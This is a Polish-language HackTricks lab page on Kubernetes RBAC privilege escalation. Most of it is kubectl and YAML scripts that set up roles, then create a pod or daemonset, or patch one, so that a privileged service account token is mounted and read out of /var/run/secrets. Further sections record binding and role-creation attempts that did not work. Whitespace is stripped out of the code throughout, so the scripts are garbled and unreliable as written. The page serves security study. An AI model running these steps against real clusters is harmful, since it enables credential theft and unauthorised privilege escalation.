Podziel się sztuczkami hackingowymi, przesyłając PR-y doHackTricks i HackTricks Cloud repozytoriów github.
Możesz uruchomić te laboratoria tylko w minikube.
Tworzenie Podów -> Eskalacja do SA ns
Zamierzamy stworzyć:
Konto usługi "test-sa" z uprawnieniami klastra do czytania sekretów
Zostanie utworzony ClusterRole "test-cr" oraz ClusterRoleBinding "test-crb"
Uprawnienia do listowania i tworzenia podów zostaną przyznane użytkownikowi o nazwie "Test"
Zostanie utworzona Rola "test-r" oraz RoleBinding "test-rb"
Następnie potwierdzimy, że SA może listować sekrety oraz że użytkownik Test może listować pody
Na koniec podszyjemy się pod użytkownika Test, aby utworzyć pod, który zawiera SA test-sa i ukraść token konta usługi.
To jest sposób, aby pokazać, że użytkownik mógł w ten sposób eskalować uprawnienia
Aby stworzyć scenariusz, używane jest konto administratora.
Ponadto, aby wyekstrahować token sa w tym przykładzie, używane jest konto administratora do wykonania polecenia wewnątrz utworzonego poda. Jednak, jak wyjaśniono tutaj, deklaracja poda mogłaby zawierać ekstrakcję tokena, więc uprawnienie "exec" nie jest konieczne do wyekstrahowania tokena, uprawnienie "create" jest wystarczające.
# Create Service Account test-sa# Create role and rolebinding to give list and create permissions over pods in default namespace to user Test# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhereecho'apiVersion: v1kind: ServiceAccountmetadata:name: test-sa---kind: RoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-rrules:- apiGroups: [""]resources: ["pods"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: rbac.authorization.k8s.io/v1kind: RoleBindingmetadata:name: test-rbsubjects:- kind: ServiceAccountname: test-sa- kind: Username: TestroleRef:kind: Rolename: test-rapiGroup: rbac.authorization.k8s.io---kind: ClusterRoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-crrules:- apiGroups: [""]resources: ["secrets"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: rbac.authorization.k8s.io/v1kind: ClusterRoleBindingmetadata:name: test-crbsubjects:- kind: ServiceAccountnamespace: defaultname: test-saapiGroup: ""roleRef:kind: ClusterRolename: test-crapiGroup: rbac.authorization.k8s.io'|kubectlapply-f-# Check test-sa can access kube-system secretskubectl--assystem:serviceaccount:default:test-sa-nkube-systemgetsecrets# Check user User can get pods in namespace defaultkubectl--asTest-ndefaultgetpods# Create a pod as user Test with the SA test-sa (privesc step)echo"apiVersion: v1kind: Podmetadata:name: test-podnamespace: defaultspec:containers:- name: alpineimage: alpinecommand: ['/bin/sh']args: ['-c', 'sleep 100000']serviceAccountName: test-saautomountServiceAccountToken: truehostNetwork: true"|kubectl--asTestapply-f-# Connect to the pod created an confirm the attached SA token belongs to test-sakubectlexec-ti-ndefaulttest-pod--cat/var/run/secrets/kubernetes.io/serviceaccount/token|cut-d"."-f2|base64-d# Clean the scenariokubectldeletepodtest-podkubectldeleteclusterrolebindingtest-crbkubectldeleteclusterroletest-crkubectldeleterolebindingtest-rbkubectldeleteroletest-rkubectldeleteserviceaccounttest-sa
Utwórz Daemonset
# Create Service Account test-sa# Create role and rolebinding to give list & create permissions over daemonsets in default namespace to user Test# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhereecho'apiVersion: v1kind: ServiceAccountmetadata:name: test-sa---kind: RoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-rrules:- apiGroups: ["apps"]resources: ["daemonsets"]verbs: ["get", "list", "create"]---apiVersion: rbac.authorization.k8s.io/v1kind: RoleBindingmetadata:name: test-rbsubjects:- kind: Username: TestroleRef:kind: Rolename: test-rapiGroup: rbac.authorization.k8s.io---kind: ClusterRoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-crrules:- apiGroups: [""]resources: ["secrets"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: rbac.authorization.k8s.io/v1kind: ClusterRoleBindingmetadata:name: test-crbsubjects:- kind: ServiceAccountnamespace: defaultname: test-saapiGroup: ""roleRef:kind: ClusterRolename: test-crapiGroup: rbac.authorization.k8s.io'|kubectlapply-f-# Check test-sa can access kube-system secretskubectl--assystem:serviceaccount:default:test-sa-nkube-systemgetsecrets# Check user User can get pods in namespace defaultkubectl--asTest-ndefaultgetdaemonsets# Create a daemonset as user Test with the SA test-sa (privesc step)echo"apiVersion: apps/v1kind: DaemonSetmetadata:name: alpinenamespace: defaultspec:selector:matchLabels:name: alpinetemplate:metadata:labels:name: alpinespec:serviceAccountName: test-saautomountServiceAccountToken: truehostNetwork: truecontainers:- name: alpineimage: alpinecommand: ['/bin/sh']args: ['-c', 'sleep 100000']"|kubectl--asTestapply-f-# Connect to the pod created an confirm the attached SA token belongs to test-sakubectlexec-ti-ndefaultdaemonset.apps/alpine--cat/var/run/secrets/kubernetes.io/serviceaccount/token|cut-d"."-f2|base64-d# Clean the scenariokubectldeletedaemonsetalpinekubectldeleteclusterrolebindingtest-crbkubectldeleteclusterroletest-crkubectldeleterolebindingtest-rbkubectldeleteroletest-rkubectldeleteserviceaccounttest-sa
Patch Daemonset
W tym przypadku zamierzamy załatać daemonset, aby jego pod załadował nasze pożądane konto usługi.
Jeśli twój użytkownik ma czasownik update zamiast patch, to nie zadziała.
# Create Service Account test-sa# Create role and rolebinding to give list & update patch permissions over daemonsets in default namespace to user Test# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhereecho'apiVersion: v1kind: ServiceAccountmetadata:name: test-sa---kind: RoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-rrules:- apiGroups: ["apps"]resources: ["daemonsets"]verbs: ["get", "list", "patch"]---apiVersion: rbac.authorization.k8s.io/v1kind: RoleBindingmetadata:name: test-rbsubjects:- kind: Username: TestroleRef:kind: Rolename: test-rapiGroup: rbac.authorization.k8s.io---kind: ClusterRoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-crrules:- apiGroups: [""]resources: ["secrets"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: rbac.authorization.k8s.io/v1kind: ClusterRoleBindingmetadata:name: test-crbsubjects:- kind: ServiceAccountnamespace: defaultname: test-saapiGroup: ""roleRef:kind: ClusterRolename: test-crapiGroup: rbac.authorization.k8s.io---apiVersion: apps/v1kind: DaemonSetmetadata:name: alpinenamespace: defaultspec:selector:matchLabels:name: alpinetemplate:metadata:labels:name: alpinespec:automountServiceAccountToken: falsehostNetwork: truecontainers:- name: alpineimage: alpinecommand: ['/bin/sh']args: ['-c', 'sleep100']'|kubectlapply-f-# Check user User can get pods in namespace defaultkubectl--asTest-ndefaultgetdaemonsets# Create a daemonset as user Test with the SA test-sa (privesc step)echo"apiVersion: apps/v1kind: DaemonSetmetadata:name: alpinenamespace: defaultspec:selector:matchLabels:name: alpinetemplate:metadata:labels:name: alpinespec:serviceAccountName: test-saautomountServiceAccountToken: truehostNetwork: truecontainers:- name: alpineimage: alpinecommand: ['/bin/sh']args: ['-c', 'sleep 100000']"|kubectl--asTestapply-f-# Connect to the pod created an confirm the attached SA token belongs to test-sakubectlexec-ti-ndefaultdaemonset.apps/alpine--cat/var/run/secrets/kubernetes.io/serviceaccount/token|cut-d"."-f2|base64-d# Clean the scenariokubectldeletedaemonsetalpinekubectldeleteclusterrolebindingtest-crbkubectldeleteclusterroletest-crkubectldeleterolebindingtest-rbkubectldeleteroletest-rkubectldeleteserviceaccounttest-sa
Nie działa
Tworzenie/Łatanie Powiązań
Nie działa:
Utwórz nowe RoleBinding tylko z czasownikiem create
Utwórz nowe RoleBinding tylko z czasownikiem patch (musisz mieć uprawnienia do powiązań)
Nie możesz tego zrobić, aby przypisać rolę sobie lub innemu SA
Zmień nowe RoleBinding tylko z czasownikiem patch (musisz mieć uprawnienia do powiązań)
Nie możesz tego zrobić, aby przypisać rolę sobie lub innemu SA
echo'apiVersion: v1kind: ServiceAccountmetadata:name: test-sa---apiVersion: v1kind: ServiceAccountmetadata:name: test-sa2---kind: RoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-rrules:- apiGroups: ["rbac.authorization.k8s.io"]resources: ["rolebindings"]verbs: ["get", "patch"]---apiVersion: rbac.authorization.k8s.io/v1kind: RoleBindingmetadata:name: test-rbsubjects:- kind: Username: TestroleRef:kind: Rolename: test-rapiGroup: rbac.authorization.k8s.io---kind: RoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-r2rules:- apiGroups: [""]resources: ["pods"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: rbac.authorization.k8s.io/v1kind: RoleBindingmetadata:name: test-rb2subjects:- kind: ServiceAccountname: test-saapiGroup: ""roleRef:kind: Rolename: test-r2apiGroup: rbac.authorization.k8s.io'|kubectlapply-f-# Create a pod as user Test with the SA test-sa (privesc step)echo"apiVersion: rbac.authorization.k8s.io/v1kind: RoleBindingmetadata:name: test-r2subjects:- kind: ServiceAccountname: test-sa2apiGroup: ""roleRef:kind: Rolename: test-r2apiGroup: rbac.authorization.k8s.io"|kubectl--asTestapply-f-# Connect to the pod created an confirm the attached SA token belongs to test-sakubectlexec-ti-ndefaulttest-pod--cat/var/run/secrets/kubernetes.io/serviceaccount/token|cut-d"."-f2|base64-d# Clean the scenariokubectldeleterolebindingtest-rbkubectldeleterolebindingtest-rb2kubectldeleteroletest-rkubectldeleteroletest-r2kubectldeleteserviceaccounttest-sakubectldeleteserviceaccounttest-sa2
Bind explicitly Bindings
W sekcji "Zapobieganie eskalacji uprawnień i uruchamianie" na stronie https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/ wspomniano, że jeśli SA może tworzyć Binding i ma explicite uprawnienia Bind do Roli/Roli klastra, może tworzyć powiązania nawet używając Ról/Ról klastra z uprawnieniami, których nie ma.
Jednak to nie zadziałało dla mnie:
# Create 2 SAs, give one of them permissions to create clusterrolebindings# and bind permissions over the ClusterRole "admin"echo 'apiVersion:v1kind:ServiceAccountmetadata:name:test-sa---apiVersion:v1kind:ServiceAccountmetadata:name:test-sa2---kind:ClusterRoleapiVersion:rbac.authorization.k8s.io/v1metadata:name:test-crrules:- apiGroups: ["rbac.authorization.k8s.io"]resources: ["clusterrolebindings"]verbs: ["get","create"]- apiGroups: ["rbac.authorization.k8s.io/v1"]resources: ["clusterroles"]verbs: ["bind"]resourceNames: ["admin"]---apiVersion:rbac.authorization.k8s.io/v1kind:ClusterRoleBindingmetadata:name:test-crbsubjects:- kind:ServiceAccountname:test-sanamespace:defaultroleRef:kind:ClusterRolename:test-crapiGroup:rbac.authorization.k8s.io' | kubectl apply -f -# Try to bind the ClusterRole "admin" with the second SA (won't work)echo 'apiVersion:rbac.authorization.k8s.io/v1kind:ClusterRoleBindingmetadata:name:test-crb2subjects:- kind:ServiceAccountname:test-sa2namespace:defaultroleRef:kind:ClusterRolename:adminapiGroup:rbac.authorization.k8s.io' | kubectl --as system:serviceaccount:default:test-sa apply -f -# Clean environmentkubectl delete clusterrolebindings test-crbkubectl delete clusterrolebindings test-crb2kubectl delete clusterrole test-crkubectl delete serviceaccount test-sakubectl delete serviceaccount test-sa
# Like the previous example, but in this case we try to use RoleBindings# instead of CLusterRoleBindingsecho 'apiVersion:v1kind:ServiceAccountmetadata:name:test-sa---apiVersion:v1kind:ServiceAccountmetadata:name:test-sa2---kind:ClusterRoleapiVersion:rbac.authorization.k8s.io/v1metadata:name:test-crrules:- apiGroups: ["rbac.authorization.k8s.io"]resources: ["clusterrolebindings"]verbs: ["get","create"]- apiGroups: ["rbac.authorization.k8s.io"]resources: ["rolebindings"]verbs: ["get","create"]- apiGroups: ["rbac.authorization.k8s.io/v1"]resources: ["clusterroles"]verbs: ["bind"]resourceNames: ["admin","edit","view"]---apiVersion:rbac.authorization.k8s.io/v1kind:RoleBindingmetadata:name:test-rbnamespace:defaultsubjects:- kind:ServiceAccountname:test-sanamespace:defaultroleRef:kind:ClusterRolename:test-crapiGroup:rbac.authorization.k8s.io' | kubectl apply -f -# Won't workecho 'apiVersion:rbac.authorization.k8s.io/v1kind:RoleBindingmetadata:name:test-rb2namespace:defaultsubjects:- kind:ServiceAccountname:test-sa2namespace:defaultroleRef:kind:ClusterRolename:adminapiGroup:rbac.authorization.k8s.io' | kubectl --as system:serviceaccount:default:test-sa apply -f -# Clean environmentkubectl delete rolebindings test-rbkubectl delete rolebindings test-rb2kubectl delete clusterrole test-crkubectl delete serviceaccount test-sakubectl delete serviceaccount test-sa2
Tworzenie dowolnych ról
W tym przykładzie próbujemy stworzyć rolę mającą uprawnienia do tworzenia i dostępu do zasobów ról. Jednak K8s uniemożliwia nam stworzenie roli z większymi uprawnieniami, niż te, które ma główny użytkownik:
# Create a SA and give the permissions "create" and "patch" over "roles"echo 'apiVersion:v1kind:ServiceAccountmetadata:name:test-sa---kind:RoleapiVersion:rbac.authorization.k8s.io/v1metadata:name:test-rrules:- apiGroups: ["rbac.authorization.k8s.io"]resources: ["roles"]verbs: ["patch","create","get"]---apiVersion:rbac.authorization.k8s.io/v1kind:RoleBindingmetadata:name:test-rbsubjects:- kind:ServiceAccountname:test-saroleRef:kind:Rolename:test-rapiGroup:rbac.authorization.k8s.io' | kubectl apply -f -# Try to create a role over all the resources with "create" and "patch"# This won't wotrkecho 'kind:RoleapiVersion:rbac.authorization.k8s.io/v1metadata:name:test-r2rules:- apiGroups: [""]resources: ["*"]verbs: ["patch","create"]' | kubectl --as system:serviceaccount:default:test-sa apply -f-# Clean the environmentkubectl delete rolebinding test-rbkubectl delete role test-rkubectl delete role test-r2kubectl delete serviceaccount test-sa